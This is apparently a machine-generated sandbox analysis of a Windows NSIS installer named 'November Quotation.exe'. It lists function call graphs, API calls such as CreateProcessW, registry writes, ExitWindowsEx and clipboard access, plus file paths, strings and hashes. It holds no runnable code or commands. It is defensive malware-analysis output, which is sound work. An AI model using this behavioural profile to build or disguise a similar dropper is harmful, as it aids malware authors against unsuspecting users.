2946->2949 2954 403605 2949->2954 2955 4058f4 18 API calls 2951->2955 2952->2933 2956 403532 CreateDirectoryW SetCurrentDirectoryW 2952->2956 2957 40610b 3 API calls 2954->2957 2958 4034bd 2955->2958 2959 403555 2956->2959 2960 40354a 2956->2960 2961 40360e 2957->2961 2958->2933 3077 405da1 lstrcpynW 2958->3077 3091 405da1 lstrcpynW 2959->3091 3090 405da1 lstrcpynW 2960->3090 2964 40610b 3 API calls 2961->2964 2966 403617 2964->2966 2969 403665 ExitWindowsEx 2966->2969 2975 403625 GetCurrentProcess 2966->2975 2967 4034cc 3078 405da1 lstrcpynW 2967->3078 2968 405dc3 18 API calls 2971 403594 DeleteFileW 2968->2971 2969->2947 2972 403672 2969->2972 2973 4035a1 CopyFileW 2971->2973 2981 403563 2971->2981 3095 40140b 2972->3095 2973->2981 2978 403635 2975->2978 2976 4035ea 2979 405c3b 40 API calls 2976->2979 2977 405c3b 40 API calls 2977->2981 2978->2969 2979->2933 2980 405dc3 18 API calls 2980->2981 2981->2968 2981->2976 2981->2977 2981->2980 2983 4035d5 CloseHandle 2981->2983 3092 40551c CreateProcessW 2981->3092 2983->2981 2984->2915 2985->2917 2987 406035 5 API calls 2986->2987 2988 403201 2987->2988 2989 40320b 2988->2989 2990 4057ec 3 API calls 2988->2990 2989->2924 2991 403213 CreateDirectoryW 2990->2991 3098 405a3c 2991->3098 3102 405a0d GetFileAttributesW CreateFileW 2994->3102 2996 402da7 3015 402db7 2996->3015 3103 405da1 lstrcpynW 2996->3103 2998 402dcd 2999 405838 2 API calls 2998->2999 3000 402dd3 2999->3000 3104 405da1 lstrcpynW 3000->3104 3002 402dde GetFileSize 3003 402eda 3002->3003 3021 402df5 3002->3021 3105 402d03 3003->3105 3005 402ee3 3007 402f13 GlobalAlloc 3005->3007 3005->3015 3141 4031de SetFilePointer 3005->3141 3116 4031de SetFilePointer 3007->3116 3010 402f46 3012 402d03 6 API calls 3010->3012 3011 402f2e 3117 402fa0 3011->3117 3012->3015 3013 402efc 3016 4031c8 ReadFile 3013->3016 3015->2932 3017 402f07 3016->3017 3017->3007 3017->3015 3018 402d03 6 API calls 3018->3021 3019 402f3a 3019->3015 3019->3019 3020 402f77 SetFilePointer 3019->3020 3020->3015 3021->3003 3021->3010 3021->3015 3021->3018 3138 4031c8 3021->3138 3023 40610b 3 API calls 3022->3023 3024 40377f 3023->3024 3025 403785 3024->3025 3026 403797 3024->3026 3163 405ce8 wsprintfW 3025->3163 3027 405c6e 3 API calls 3026->3027 3028 4037c7 3027->3028 3030 4037e6 lstrcatW 3028->3030 3032 405c6e 3 API calls 3028->3032 3031 403795 3030->3031 3147 403a41 3031->3147 3032->3030 3035 4058f4 18 API calls 3036 403818 3035->3036 3037 4038ac 3036->3037 3039 405c6e 3 API calls 3036->3039 3038 4058f4 18 API calls 3037->3038 3040 4038b2 3038->3040 3041 40384a 3039->3041 3042 4038c2 LoadImageW 3040->3042 3043 405dc3 18 API calls 3040->3043 3041->3037 3047 40386b lstrlenW 3041->3047 3050 405819 CharNextW 3041->3050 3044 403968 3042->3044 3045 4038e9 RegisterClassW 3042->3045 3043->3042 3046 40140b 2 API calls 3044->3046 3048 40391f SystemParametersInfoW CreateWindowExW 3045->3048 3075 403972 3045->3075 3049 40396e 3046->3049 3051 403879 lstrcmpiW 3047->3051 3052 40389f 3047->3052 3048->3044 3057 403a41 19 API calls 3049->3057 3049->3075 3055 403868 3050->3055 3051->3052 3053 403889 GetFileAttributesW 3051->3053 3054 4057ec 3 API calls 3052->3054 3056 403895 3053->3056 3058 4038a5 3054->3058 3055->3047 3056->3052 3059 405838 2 API calls 3056->3059 3060 40397f 3057->3060 3164 405da1 lstrcpynW 3058->3164 3059->3052 3062 40398b ShowWindow LoadLibraryW 3060->3062 3063 403a0e 3060->3063 3065 4039b1 GetClassInfoW 3062->3065 3066 4039aa LoadLibraryW 3062->3066 3156 40511e OleInitialize 3063->3156 3068 4039c5 GetClassInfoW RegisterClassW 3065->3068 3069 4039db DialogBoxParamW 3065->3069 3066->3065 3067 403a14 3070 403a30 3067->3070 3071 403a18 3067->3071 3068->3069 3072 40140b 2 API calls 3069->3072 3073 40140b 2 API calls 3070->3073 3074 40140b 2 API calls 3071->3074 3071->3075 3072->3075 3073->3075 3074->3075 3075->2933 3076->2922 3077->2967 3078->2936 3080 4036a9 3079->3080 3081 40369b CloseHandle 3079->3081 3173 4036d6 3080->3173 3081->3080 3084 405629 71 API calls 3085 4034f0 OleUninitialize 3084->3085 3085->2945 3085->2946 3087 405592 3086->3087 3088 40350e ExitProcess 3087->3088 3089 4055a6 MessageBoxIndirectW 3087->3089 3089->3088 3090->2959 3091->2981 3093 405557 3092->3093 3094 40554b CloseHandle 3092->3094 3093->2981 3094->3093 3096 401389 2 API calls 3095->3096 3097 401420 3096->3097 3097->2947 3099 405a49 GetTickCount GetTempFileNameW 3098->3099 3100 403227 3099->3100 3101 405a7f 3099->3101 3100->2924 3101->3099 3101->3100 3102->2996 3103->2998 3104->3002 3106 402d24 3105->3106 3107 402d0c 3105->3107 3108 402d34 GetTickCount 3106->3108 3109 402d2c 3106->3109 3110 402d15 DestroyWindow 3107->3110 3111 402d1c 3107->3111 3113 402d42 CreateDialogParamW ShowWindow 3108->3113 3114 402d65 3108->3114 3142 406144 3109->3142 3110->3111 3111->3005 3113->3114 3114->3005 3116->3011 3118 402fbb 3117->3118 3119 402fe8 3118->3119 3146 4031de SetFilePointer 3118->3146 3120 4031c8 ReadFile 3119->3120 3122 402ff3 3120->3122 3123 403149 3122->3123 3124 403005 GetTickCount 3122->3124 3125 40315e 3122->3125 3123->3019 3124->3123 3134 403052 3124->3134 3126 403162 3125->3126 3127 40317a 3125->3127 3128 4031c8 ReadFile 3126->3128 3127->3123 3130 4031c8 ReadFile 3127->3130 3131 403195 WriteFile 3127->3131 3128->3123 3129 4031c8 ReadFile 3129->3134 3130->3127 3131->3123 3132 4031a9 3131->3132 3132->3123 3132->3127 3133 4030a8 GetTickCount 3133->3134 3134->3123 3134->3129 3134->3133 3135 4030cd MulDiv wsprintfW 3134->3135 3137 403111 WriteFile 3134->3137 3136 40504b 25 API calls 3135->3136 3136->3134 3137->3123 3137->3134 3139 405a90 ReadFile 3138->3139 3140 4031db 3139->3140 3140->3021 3141->3013 3143 406161 PeekMessageW 3142->3143 3144 402d32 3143->3144 3145 406157 DispatchMessageW 3143->3145 3144->3005 3145->3143 3146->3119 3148 403a55 3147->3148 3165 405ce8 wsprintfW 3148->3165 3150 403ac6 3151 405dc3 18 API calls 3150->3151 3152 403ad2 SetWindowTextW 3151->3152 3153 4037f6 3152->3153 3154 403aee 3152->3154 3153->3035 3154->3153 3155 405dc3 18 API calls 3154->3155 3155->3154 3166 404032 3156->3166 3158 405168 3159 404032 SendMessageW 3158->3159 3160 40517a OleUninitialize 3159->3160 3160->3067 3161 405141 3161->3158 3169 401389 3161->3169 3163->3031 3164->3037 3165->3150 3167 40404a 3166->3167 3168 40403b SendMessageW 3166->3168 3167->3161 3168->3167 3171 401390 3169->3171 3170 4013fe 3170->3161 3171->3170 3172 4013cb MulDiv SendMessageW 3171->3172 3172->3171 3174 4036e4 3173->3174 3175 4036ae 3174->3175 3176 4036e9 FreeLibrary GlobalFree 3174->3176 3175->3084 3176->3175 3176->3176 4020 403729 4021 403734 4020->4021 4022 403738 4021->4022 4023 40373b GlobalAlloc 4021->4023 4023->4022 4024 401cab 4025 402b1b 18 API calls 4024->4025 4026 401cb2 4025->4026 4027 402b1b 18 API calls 4026->4027 4028 401cba GetDlgItem 4027->4028 4029 4024e6 4028->4029 3349 40232f 3350 402335 3349->3350 3351 402b38 18 API calls 3350->3351 3352 402347 3351->3352 3353 402b38 18 API calls 3352->3353 3354 402351 RegCreateKeyExW 3353->3354 3355 40237b 3354->3355 3356 402791 3354->3356 3357 402b38 18 API calls 3355->3357 3359 402396 3355->3359 3362 40238c lstrlenW 3357->3362 3358 4023a2 3361 4023bd RegSetValueExW 3358->3361 3363 402fa0 33 API calls 3358->3363 3359->3358 3360 402b1b 18 API calls 3359->3360 3360->3358 3364 4023d3 RegCloseKey 3361->3364 3362->3359 3363->3361 3364->3356 4030 4016af 4031 402b38 18 API calls 4030->4031 4032 4016b5 GetFullPathNameW 4031->4032 4033 4016f1 4032->4033 4034 4016cf 4032->4034 4035 4029c5 4033->4035 4036 401706 GetShortPathNameW 4033->4036 4034->4033 4037 4060e4 2 API calls 4034->4037 4036->4035 4038 4016e1 4037->4038 4038->4033 4040 405da1 lstrcpynW 4038->4040 4040->4033 4041 4027b3 4042 402b38 18 API calls 4041->4042 4043 4027c1 4042->4043 4044 4027d7 4043->4044 4045 402b38 18 API calls 4043->4045 4046 4059e8 2 API calls 4044->4046 4045->4044 4047 4027dd 4046->4047 4067 405a0d GetFileAttributesW CreateFileW 4047->4067 4049 4027ea 4050 402893 4049->4050 4051 4027f6 GlobalAlloc 4049->4051 4054 40289b DeleteFileW 4050->4054 4055 4028ae 4050->4055 4052 40288a CloseHandle 4051->4052 4053 40280f 4051->4053 4052->4050 4068 4031de SetFilePointer 4053->4068 4054->4055 4057 402815 4058 4031c8 ReadFile 4057->4058 4059 40281e GlobalAlloc 4058->4059 4060 402862 WriteFile GlobalFree 4059->4060 4061 40282e 4059->4061 4062 402fa0 33 API calls 4060->4062 4063 402fa0 33 API calls 4061->4063 4064 402887 4062->4064 4066 40283b 4063->4066 4064->4052 4065 402859 GlobalFree 4065->4060 4066->4065 4067->4049 4068->4057 4069 404134 lstrlenW 4070 404153 4069->4070 4071 404155 WideCharToMultiByte 4069->4071 4070->4071 4072 4028b4 4073 402b1b 18 API calls 4072->4073 4074 4028ba 4073->4074 4075 4028f6 4074->4075 4076 4028dd 4074->4076 4080 402791 4074->4080 4078 402900 4075->4078 4079 40290c 4075->4079 4077 4028e2 4076->4077 4085 4028f3 4076->4085 4086 405da1 lstrcpynW 4077->4086 4081 402b1b 18 API calls 4078->4081 4082 405dc3 18 API calls 4079->4082 4081->4085 4082->4085 4085->4080 4087 405ce8 wsprintfW 4085->4087 4086->4080 4087->4080 4088 4014b8 4089 4014be 4088->4089 4090 401389 2 API calls 4089->4090 4091 4014c6 4090->4091 3482 4015b9 3483 402b38 18 API calls 3482->3483 3484 4015c0 3483->3484 3485 405897 4 API calls 3484->3485 3494 4015c9 3485->3494 3486 401614 3487 401619 3486->3487 3490 401646 3486->3490 3489 401423 25 API calls 3487->3489 3488 405819 CharNextW 3491 4015d7 CreateDirectoryW 3488->3491 3493 401620 3489->3493 3492 401423 25 API calls 3490->3492 3491->3494 3495 4015ed GetLastError 3491->3495 3499 40163e 3492->3499 3500 405da1 lstrcpynW 3493->3500 3494->3486 3494->3488 3495->3494 3497 4015fa GetFileAttributesW 3495->3497 3497->3494 3498 40162d SetCurrentDirectoryW 3498->3499 3500->3498 4092 401939 4093 402b38 18 API calls 4092->4093 4094 401940 lstrlenW 4093->4094 4095 4024e6 4094->4095 4096 402939 4097 402b1b 18 API calls 4096->4097 4098 40293f 4097->4098 4099 402972 4098->4099 4101 402791 4098->4101 4102 40294d 4098->4102 4100 405dc3 18 API calls 4099->4100 4099->4101 4100->4101 4102->4101 4104 405ce8 wsprintfW 4102->4104 4104->4101 4105 40443a 4106 404470 4105->4106 4107 40444a 4105->4107 4109 40404d 8 API calls 4106->4109 4108 403fe6 19 API calls 4107->4108 4110 404457 SetDlgItemTextW 4108->4110 4111 40447c 4109->4111 4110->4106 4112 40173f 4113 402b38 18 API calls 4112->4113 4114 401746 4113->4114 4115 405a3c 2 API calls 4114->4115 4116 40174d 4115->4116 4116->4116 4117 404fbf 4118 404fe3 4117->4118 4119 404fcf 4117->4119 4120 404feb IsWindowVisible 4118->4120 4128 405002 4118->4128 4121 404fd5 4119->4121 4122 40502c 4119->4122 4120->4122 4124 404ff8 4120->4124 4123 404032 SendMessageW 4121->4123 4125 405031 CallWindowProcW 4122->4125 4126 404fdf 4123->4126 4127 404915 5 API calls 4124->4127 4125->4126 4127->4128 4128->4125 4129 404995 4 API calls 4128->4129 4129->4122

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 403229-4032bf #17 SetErrorMode OleInitialize call 40610b SHGetFileInfoW call 405da1 GetCommandLineW call 405da1 GetModuleHandleW 7 4032c1-4032c8 0->7 8 4032c9-4032db call 405819 CharNextW 0->8 7->8 11 4033a9-4033af 8->11 12 4032e0-4032e6 11->12 13 4033b5 11->13 15 4032e8-4032ed 12->15 16 4032ef-4032f5 12->16 14 4033c9-4033e3 GetTempPathW call 4031f5 13->14 25 4033e5-403403 GetWindowsDirectoryW lstrcatW call 4031f5 14->25 26 40343b-403455 DeleteFileW call 402d67 14->26 15->15 15->16 18 4032f7-4032fb 16->18 19 4032fc-403300 16->19 18->19 20 403306-40330c 19->20 21 40339a-4033a5 call 405819 19->21 23 403326-40333d 20->23 24 40330e-403315 20->24 21->11 39 4033a7-4033a8 21->39 30 40336b-403381 23->30 31 40333f-403355 23->31 28 403317-40331a 24->28 29 40331c 24->29 25->26 44 403405-403435 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4031f5 25->44 40 4034eb-4034fa call 403691 OleUninitialize 26->40 41 40345b-403461 26->41 28->23 28->29 29->23 30->21 37 403383-403398 30->37 31->30 35 403357-40335f 31->35 42 403361-403364 35->42 43 403366 35->43 37->21 45 4033b7-4033c4 call 405da1 37->45 39->11 57 403500-403510 call 40557d ExitProcess 40->57 58 4035f6-4035fc 40->58 46 403463-40346e call 405819 41->46 47 4034db-4034e2 call 40376b 41->47 42->30 42->43 43->30 44->26 44->40 45->14 61 403470-403481 46->61 62 4034a5-4034af 46->62 56 4034e7 47->56 56->40 59 403679-403681 58->59 60 4035fe-40361b call 40610b * 3 58->60 66 403683 59->66 67 403687-40368b ExitProcess 59->67 91 403665-403670 ExitWindowsEx 60->91 92 40361d-40361f 60->92 65 403483-403485 61->65 68 4034b1-4034bf call 4058f4 62->68 69 403516-403530 lstrcatW lstrcmpiW 62->69 72 403487-40349d 65->72 73 40349f-4034a3 65->73 66->67 68->40 81 4034c1-4034d7 call 405da1 * 2 68->81 69->40 75 403532-403548 CreateDirectoryW SetCurrentDirectoryW 69->75 72->62 72->73 73->62 73->65 78 403555-40357e call 405da1 75->78 79 40354a-403550 call 405da1 75->79 87 403583-40359f call 405dc3 DeleteFileW 78->87 79->78 81->47 98 4035e0-4035e8 87->98 99 4035a1-4035b1 CopyFileW 87->99 91->59 96 403672-403674 call 40140b 91->96 92->91 97 403621-403623 92->97 96->59 97->91 101 403625-403637 GetCurrentProcess 97->101 98->87 103 4035ea-4035f1 call 405c3b 98->103 99->98 102 4035b3-4035d3 call 405c3b call 405dc3 call 40551c 99->102 101->91 109 403639-40365b 101->109 102->98 115 4035d5-4035dc CloseHandle 102->115 103->40 109->91 115->98
                                                                                                              APIs
                                                                                                              • #17.COMCTL32 ref: 00403248
                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00403253
                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040325A
                                                                                                                • Part of subcall function 0040610B: GetModuleHandleA.KERNEL32(?,?,00000020,0040326C,00000008), ref: 0040611D
                                                                                                                • Part of subcall function 0040610B: LoadLibraryA.KERNELBASE(?,?,00000020,0040326C,00000008), ref: 00406128
                                                                                                                • Part of subcall function 0040610B: GetProcAddress.KERNEL32(00000000,?), ref: 00406139
                                                                                                              • SHGetFileInfoW.SHELL32(0042B1B8,00000000,?,000002B4,00000000), ref: 00403282
                                                                                                                • Part of subcall function 00405DA1: lstrcpynW.KERNEL32(?,?,00000400,00403297,inelegancy,NSIS Error), ref: 00405DAE
                                                                                                              • GetCommandLineW.KERNEL32(inelegancy,NSIS Error), ref: 00403297
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\November Quotation.exe",00000000), ref: 004032AA
                                                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\November Quotation.exe",00000020), ref: 004032D1
                                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033DA
                                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033EB
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F7
                                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040340B
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403413
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403424
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040342C
                                                                                                              • DeleteFileW.KERNELBASE(1033), ref: 00403440
                                                                                                              • OleUninitialize.OLE32(?), ref: 004034F0
                                                                                                              • ExitProcess.KERNEL32 ref: 00403510
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\November Quotation.exe",00000000,?), ref: 0040351C
                                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\November Quotation.exe",00000000,?), ref: 00403528
                                                                                                              • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403534
                                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040353B
                                                                                                              • DeleteFileW.KERNEL32(0042A9B8,0042A9B8,?,00435000,?), ref: 00403595
                                                                                                              • CopyFileW.KERNEL32(00442800,0042A9B8,00000001), ref: 004035A9
                                                                                                              • CloseHandle.KERNEL32(00000000,0042A9B8,0042A9B8,?,0042A9B8,00000000), ref: 004035D6
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040362C
                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403668
                                                                                                              • ExitProcess.KERNEL32 ref: 0040368B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                              • String ID: "C:\Users\user\Desktop\November Quotation.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\sognenes\iconograph$C:\Users\user\AppData\Local\sognenes\iconograph\Folkways$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$inelegancy$~nsu.tmp
                                                                                                              • API String ID: 4107622049-422494109
                                                                                                              • Opcode ID: b79f5bf6b15ea5969d89ca043424e6ca4daa7e51e6b9f16cdbdc5c44e283160b
                                                                                                              • Instruction ID: 02b0c0aa23ea66072d22554f7a9d706dafbd78a3d23bdfa468f983da76c936b2
                                                                                                              • Opcode Fuzzy Hash: b79f5bf6b15ea5969d89ca043424e6ca4daa7e51e6b9f16cdbdc5c44e283160b
                                                                                                              • Instruction Fuzzy Hash: 48B1D230504310AAD7207F619E4AA2B3EACEF4574AF00443FF941B62E1DBBD4A45CB6E

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 116 40518a-4051a5 117 405336-40533d 116->117 118 4051ab-405274 GetDlgItem * 3 call 40401b call 4048e8 GetClientRect GetSystemMetrics SendMessageW * 2 116->118 120 405367-405374 117->120 121 40533f-405361 GetDlgItem CreateThread CloseHandle 117->121 141 405292-405295 118->141 142 405276-405290 SendMessageW * 2 118->142 123 405392-40539c 120->123 124 405376-40537c 120->124 121->120 127 4053f2-4053f6 123->127 128 40539e-4053a4 123->128 125 4053b7-4053c0 call 40404d 124->125 126 40537e-40538d ShowWindow * 2 call 40401b 124->126 138 4053c5-4053c9 125->138 126->123 127->125 135 4053f8-4053fe 127->135 131 4053a6-4053b2 call 403fbf 128->131 132 4053cc-4053dc ShowWindow 128->132 131->125 139 4053ec-4053ed call 403fbf 132->139 140 4053de-4053e7 call 40504b 132->140 135->125 136 405400-405413 SendMessageW 135->136 143 405515-405517 136->143 144 405419-405444 CreatePopupMenu call 405dc3 AppendMenuW 136->144 139->127 140->139 145 4052a5-4052bc call 403fe6 141->145 146 405297-4052a3 SendMessageW 141->146 142->141 143->138 153 405446-405456 GetWindowRect 144->153 154 405459-40546e TrackPopupMenu 144->154 155 4052f2-405313 GetDlgItem SendMessageW 145->155 156 4052be-4052d2 ShowWindow 145->156 146->145 153->154 154->143 157 405474-40548b 154->157 155->143 160 405319-405331 SendMessageW * 2 155->160 158 4052e1 156->158 159 4052d4-4052df ShowWindow 156->159 161 405490-4054ab SendMessageW 157->161 162 4052e7-4052ed call 40401b 158->162 159->162 160->143 161->161 163 4054ad-4054d0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 161->163 162->155 165 4054d2-4054f9 SendMessageW 163->165 165->165 166 4054fb-40550f GlobalUnlock SetClipboardData CloseClipboard 165->166 166->143
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004051E9
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004051F8
                                                                                                              • GetClientRect.USER32(?,?), ref: 00405235
                                                                                                              • GetSystemMetrics.USER32(00000015), ref: 0040523D
                                                                                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 0040525E
                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040526F
                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405282
                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405290
                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004052A3
                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004052C5
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004052D9
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004052FA
                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040530A
                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405323
                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040532F
                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405207
                                                                                                                • Part of subcall function 0040401B: SendMessageW.USER32(00000028,?,00000001,00403E47), ref: 00404029
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040534C
                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_0000511E,00000000), ref: 0040535A
                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00405361
                                                                                                              • ShowWindow.USER32(00000000), ref: 00405385
                                                                                                              • ShowWindow.USER32(0001045E,00000008), ref: 0040538A
                                                                                                              • ShowWindow.USER32(00000008), ref: 004053D4
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                                              • CreatePopupMenu.USER32 ref: 00405419
                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040542D
                                                                                                              • GetWindowRect.USER32(?,?), ref: 0040544D
                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405466
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040549E
                                                                                                              • OpenClipboard.USER32(00000000), ref: 004054AE
                                                                                                              • EmptyClipboard.USER32 ref: 004054B4
                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004054C0
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004054CA
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004054DE
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004054FE
                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405509
                                                                                                              • CloseClipboard.USER32 ref: 0040550F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                              • String ID: $;u${
                                                                                                              • API String ID: 590372296-2974606032
                                                                                                              • Opcode ID: 203e9f1d86d533f2ebbe7f86b819a7276a20043a8637b95097349cfd405fd485
                                                                                                              • Instruction ID: 34766a67a8348c891c509fbed0d62983ec1eb8fa6b5cfd063670c437a0e1cb12
                                                                                                              • Opcode Fuzzy Hash: 203e9f1d86d533f2ebbe7f86b819a7276a20043a8637b95097349cfd405fd485
                                                                                                              • Instruction Fuzzy Hash: F5B12871800608FFDB119F60DD89AAE7B79FB48355F10803AFA41BA1A0CBB59E51DF58

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 341 405dc3-405dce 342 405dd0-405ddf 341->342 343 405de1-405df7 341->343 342->343 344 405dfd-405e0a 343->344 345 40600f-406015 343->345 344->345 346 405e10-405e17 344->346 347 40601b-406026 345->347 348 405e1c-405e29 345->348 346->345 350 406031-406032 347->350 351 406028-40602c call 405da1 347->351 348->347 349 405e2f-405e3b 348->349 352 405e41-405e7d 349->352 353 405ffc 349->353 351->350 355 405e83-405e8e GetVersion 352->355 356 405f9d-405fa1 352->356 357 40600a-40600d 353->357 358 405ffe-406008 353->358 359 405e90-405e94 355->359 360 405ea8 355->360 361 405fa3-405fa7 356->361 362 405fd6-405fda 356->362 357->345 358->345 359->360 365 405e96-405e9a 359->365 368 405eaf-405eb6 360->368 366 405fb7-405fc4 call 405da1 361->366 367 405fa9-405fb5 call 405ce8 361->367 363 405fe9-405ffa lstrlenW 362->363 364 405fdc-405fe4 call 405dc3 362->364 363->345 364->363 365->360 373 405e9c-405ea0 365->373 377 405fc9-405fd2 366->377 367->377 369 405eb8-405eba 368->369 370 405ebb-405ebd 368->370 369->370 375 405ef9-405efc 370->375 376 405ebf-405edc call 405c6e 370->376 373->360 378 405ea2-405ea6 373->378 382 405f0c-405f0f 375->382 383 405efe-405f0a GetSystemDirectoryW 375->383 384 405ee1-405ee5 376->384 377->363 381 405fd4 377->381 378->368 385 405f95-405f9b call 406035 381->385 387 405f11-405f1f GetWindowsDirectoryW 382->387 388 405f7a-405f7c 382->388 386 405f7e-405f82 383->386 389 405f84-405f88 384->389 390 405eeb-405ef4 call 405dc3 384->390 385->363 386->385 386->389 387->388 388->386 391 405f21-405f2b 